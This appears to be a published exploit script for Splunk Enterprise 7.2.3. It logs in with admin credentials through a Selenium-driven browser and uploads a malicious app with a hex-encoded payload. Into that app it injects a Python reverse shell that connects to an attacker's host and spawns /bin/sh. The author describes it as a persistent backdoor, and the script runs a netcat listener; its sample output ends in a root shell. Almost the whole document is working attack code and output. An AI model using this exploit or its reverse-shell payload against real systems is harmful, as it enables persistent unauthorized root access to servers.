Splunk Enterprise 7.2.3 - (Authenticated) Custom App Remote Code Execution

#!/usr/bin/python

# Exploit Title: Splunk Enterprise 7.2.3 Custom App RCE (persistent backdoor)
# Date: January 23, 2019
# Exploit Author: Lee Mazzoleni
# Vendor Homepage: https://www.splunk.com/
# Software Link: https://www.splunk.com/en_us/download/splunk-enterprise.html
# Version: 7.2.3
# Tested on: kali 4.18.0-kali2-amd64
# CVE : n/a

from selenium import webdriver
from selenium.webdriver.common.keys import Keys
from time import sleep
from sys import stdout,argv
from os import getcwd,path,system
from subprocess import Popen

# Download and unpack the correct version for your OS from here: github.com/mozilla/geckodriver/releases
gecko_driver_path = '/root/Desktop/SplunkSploit/Gecko/geckodriver'

def checkLogin(url):
	if '/login' not in url and '/logout' not in url:
		print 'Login successful!'
	else:
		print 'Login failed! Aborting...'
		exit()


def checkUrl(url):
	if '_upload' not in url:
		print '[-] Navigation error, aborting...'
		exit()


def exploit(splunk_target_url, splunk_admin_user, splunk_admin_pass, lport):
	print '[+] Starting bot ...'
	profile = webdriver.FirefoxProfile()
	profile.accept_untrusted_certs = True
	driver = webdriver.Firefox(firefox_profile=profile, executable_path=gecko_driver_path)

	print '[*] Loading the target page ...'
	driver.get(splunk_target_url)
	sleep(1)

	stdout.write('[*] Attempting to log in with the provided credentials ... ')
	username_field = driver.find_element_by_name("username")
	username_field.clear()
	username_field.send_keys(splunk_admin_user)
	sleep(1)

	pw_field = driver.find_element_by_name("password")
	pw_field.clear()
	pw_field.send_keys(splunk_admin_pass)
	pw_field.send_keys(Keys.RETURN)
	sleep(3)

	current_url = driver.current_url
	checkLogin(current_url)

	url = driver.current_url.split('/')
	upload_url = url[0] + '//' + str(url[2]) + '/' + url[3] + '/manager/appinstall/_upload'
	print '[*] Navigating to the uploads page ({}) ...'.format(upload_url)
	driver.get(upload_url)
	sleep(1)

	current_url = driver.current_url
	checkUrl(current_url)

	form = driver.find_element_by_tag_name("form")
	input = form.find_element_by_id("appfile")
	input.send_keys(getcwd()+'/'+'splunk-shell.tar.gz')
	force_update = driver.find_element_by_id("force")
	force_update.click()
	submit_button = driver.find_element_by_class_name("splButton-primary")
	submit_button.click()

	print '[*] Your persistent shell has been successfully uploaded!'
	driver.quit()
	print '[+] Preparing to catch shell ... (this may take up to 1 minute)'
	system('nc -lvp {}'.format(lport))


def generatePayload(lhost, lport):
	# this hex decodes into the evil splunk app (tar.gz file) that we will be uploading as the payload
	# after the app is written to disk, a reverse shell is created and added to the app (it uses the user-supplied lhost and lport parameters to create the shell)
	# the app configuration sets it to be enabled upon installation (restarting splunk / manually enabling it is not required.)
	# this is a PERSISTENT backdoor, there is no need to re-upload multiple times... the backdoor will reconnect every 10-20 seconds
	print '[*] Creating Splunk App...'
	shell = '1f8b080030e9485c0003ed5b6b6fdb3614cd67fd0a221e9036ab65bd95b87b206b332c5830144bda0e705d8396689b8b446aa214271bf6df7749d9895f8993d451da95e7432c91145f87e7f25e89115952b2b3a6189124696d3d0e2c40e8fbea17b0f8abae6dd7731c3b702c1fd26dc70ead2de43f527fe6508a02e7086de59c17b7955b97ff8542ccf29ff0083fc22a50fc2ff37e0bffaee36bfe6bc10afe7196991167838db521090e6ee11fb85fe0df0bc2700b591bebc12df8caf9ef50061390245d037e0a82be4784e17e4262c3e894b46b50d13ba782420a64d99098e09245239277e13ac3d1191e92ae0109d1596fc0f35e99c5508d50859f7a6c1aeb31a7ff3e658fe103dc63fff71cdf95fb7fe885dafed78139fe535260902fdef022b8bfffe7867affaf07abf98fc900974961ca844f6f4312ec79de8dfcbbaebbc07fe078b6deffeb40a76be0282242eed839c1316aa30eda45dd17689c53f00726b772b3cf79265a82b038c53469750d7291f1bc80e7c4a528486af0312339dc32dee7f1a561341a0df4eee8f0fdc9e9c1e9e1491b9173c220334f71824a417281c48897498cfa04499703151c45d00768558c704e62744ec958b92502dabfbeb963979f7a6abf08acd6bf0a0436a4fef5fe7fe8840bfaf743dbd2faaf031d88f65a931860fadb13bccc23d2535ebd28d3ae710e6aa59c81e042d3315d23e57141531512f89ebfef04e19e65865610ec419c6f8158676b55a2bd531da1e9eebbaee35475dc51e68b66686d3b7bbe6beefb76e8dad77d95a1ceba07617c96e9d976b01f5c3f781d0e4dcd1f8e53caee5a99ebb87bd7954de2a9d6523875e7ce795635aa3bf33fa77fe803d865686ab30ee0fdfd3fcf0eb5ff5f0b6ee05f6a96461b5a06f7e7dff78240f35f076ee71f12121ac125676624c403db58e3ffbb8ee7ccf32fff3a7affaf03ad5df46a84d910bcef11b8e15986123ee408763462222448a1d247840e47456b4ce36284605f4297e021209ac266f5026181c6b07ae4af2c9b612803aebcbc5625d06ecb30a1e66359f13f060254f5b591e766172f914a5275b7d19e05292aa10f9be130e7258bdba8cc9367d33549d3614b9c8173318d525bd51aeec98ef7fa093c66666cf81c428d664e3288279085acaacedea7543aa483a54aff350c98c1d3326708366739e4c9f328e3824add5036447ca0b2b64f549de80d1fc3f4c6db73532d27a96a73923d335daddd5df50ba5d05b16f13425ac2266c093848f651b096544a067630ab3bf1353a80a5fee2019b491bca0443c979c40c03556cfa996659b55f568f2401b3553fe779332595b13e6263aab26ee2a7f92d58708e1eca5ac60a983aadfaa1be391f4d30a72515c65a2262a670720207fccd1ce352fb37d46742057da4e0ca33b83d589e627b01ac5425333839a215b72bdbd96ecacaab7225d552957d2f62ceb22ca61ca25f9a8c831131904aaac585e5d0f6e1056d95d1a8461ca214a2d1e1d063359d1a5cc0218577f56b3a316f53c3b8f4fcec6d8b9d2795dec5cd9804db333b1858e3b357c29ce8794350b9eb5edabc4ca3c06bebcaf8c8e514a7e465448614ff4a9b4cd30c405139323bfe55525956cabb6e40338fe13763e84133a648a6fc5941ca909c41a74b0aa2a048d517665405e4c3788b93eb4617a187909a39bd8fd5f207823f9fb1c2e21401ad913a316f184e7ed46e862df9f98e7993e4ef60618eb53ef90ff6f2c7cff1d8a47f800f480f7fff293b0f6ff6bc032fff2ed2e5c6cb08d75efff2dcb5e8cffbd50bfffab05dabc7eddb851ffa6bdb1361ea0ffc0d1e77f6a81d6ffd78d39fd4fe39f0db7f100ff2fb0b5ff570b56f2af3ef56fee0ce83afb6f078bf6df0f1cfdfeb7163420ec7e37f9b6587d596c74a6673cba46e3e7a3c3e3d707c7470727cd540c698cbe4729fc3d3841ead6681cfe71fafbc1abd3e65f2a6ffa64e7e3876e77f743b7fd417cfbecc7ef20f387cec77677f7795bef379f1756ea7fc327c0a5c66f3bffe1848be7bf7dc70db4feebc0acfe6dd3322da3317d912b5ff8c955408765ae3e01a2014d88612c1f198fa9a8ce8cdf7080048a387b83fd20d8b78965937ee0c5b11b39837e1085180ff62c2f8afca88ffbcefeaa63e7039c086224b84f126963e4526d42e7b429d90056ea9fb2ac2c36e700acddffc3a5f39ff080d67f1d58a5ff57ea10a6409821b512d4770c81d30cd4288f079a205211e5342bdaad96a9fe6b40ad1f33bbec1a535b004ab5c01e14243fc709b22da3b209c565a6245d322ddfcf0137e83f2617646306609dfe9d65fddbdaffaf074bfa37670dc054f56a41ac3003102ba87b8814463c256fe4d10f04f2fee6e4cdf1dbdf7eedbdfea9551568c57da311f124bea588cc96c58a111e93aae0aa625536147ceaa9d3d0d0d0d0d0d0d0d0d0d0d0d0d0d0d0d0d0f8ecf11f88a26c5b00500000'
	bytes = shell.decode('hex')
	f = open('splunk-shell.tar.gz','wb')
	f.write(bytes)
	f.close()
	print '\t==> Adding reverse shell (to {}:{}) to the app...'.format(lhost,lport)
	f = open('shell.py','w')
	f.write('import sys,socket,os,pty\n')
	f.write('ip="{}"\n'.format(lhost))
	f.write('port="{}"\n'.format(lport))
	f.write('s=socket.socket()\n')
	f.write('s.connect((ip,int(port)))\n')
	f.write('[os.dup2(s.fileno(),fd) for fd in (0,1,2)]\n')
	f.write('pty.spawn("/bin/sh")\n')
	f.close()
	decompress_cmd = 'tar zxvf splunk-shell.tar.gz &>/dev/null; rm splunk-shell.tar.gz'
	p = Popen(decompress_cmd, shell=True, executable='/bin/bash')
	p.wait()
	move_cmd = 'mv shell.py splunk-shell/bin/'
	p = Popen(move_cmd, shell=True, executable='/bin/bash')
	p.wait()
	compress_cmd = 'tar zcvf splunk-shell.tar.gz splunk-shell/ &>/dev/null; rm -r splunk-shell/'
	p = Popen(compress_cmd, shell=True, executable='/bin/bash')
	p.wait()
	if path.isfile('splunk-shell.tar.gz'):
		print '\t==> Payload Ready! (splunk-shell.tar.gz)'


def showUsage():
	print '\n\tScript Usage: {} <targetUrl> <username> <password> <lhost> <lport>'.format(argv[0])
        print '\tExample: {} http://192.168.4.16:8000 admin changeme 192.168.4.5 4444\n'.format(argv[0])


if len(argv) != 6:
	showUsage()
	exit()

if not path.isfile(gecko_driver_path):
	print '\n\t[!] This program requires geckodriver, download the corresponding version for your OS from the following link:'
	print '\t\t==> https://github.com/mozilla/geckodriver/releases'
	print '\n\t[!] Extract the geckodriver binary, then add its full path to line 20 of this script.'
	print '\t\t==> gecko_driver_path = "/tmp/geckodriver"\n'
	exit()

splunk_target_url = argv[1]
splunk_admin_user = argv[2]
splunk_admin_pass = argv[3]
lhost = argv[4]
lport = argv[5]
generatePayload(lhost, lport)
exploit(splunk_target_url, splunk_admin_user, splunk_admin_pass, lport)






####################
## SCRIPT OUTPUT: ##
####################
# root@kali:~/SplunkSploit# python splunksploit.py
#
#	Script Usage: splunksploit.py <targetUrl> <username> <password> <lhost> <lport>
#	Example: splunksploit.py http://192.168.4.16:8000 admin changeme 192.168.4.5 4444
#
# root@kali:~/SplunkSploit# python splunksploit.py http://172.16.224.194:8000/ admin changeme 172.16.224.190 4444
# [*] Creating Splunk App...
# 	==> Adding reverse shell (to 172.16.224.190:4444) to the app...
# 	==> Payload Ready! (splunk-shell.tar.gz)
# [+] Starting bot ...
# [*] Loading the target page ...
# [*] Attempting to log in with the provided credentials ... Login successful!
# [*] Navigating to the uploads page (http://172.16.224.194:8000/en-US/manager/appinstall/_upload) ...
# [*] Your persistent shell has been successfully uploaded!
# [+] Preparing to catch shell ... (this may take up to 1 minute)
# Ncat: Version 7.70 ( https://nmap.org/ncat )
# Ncat: Listening on :::4444
# Ncat: Listening on 0.0.0.0:4444
# Ncat: Connection from 172.16.224.195.
# Ncat: Connection from 172.16.224.195:48902.
# # whoami
# whoami
# root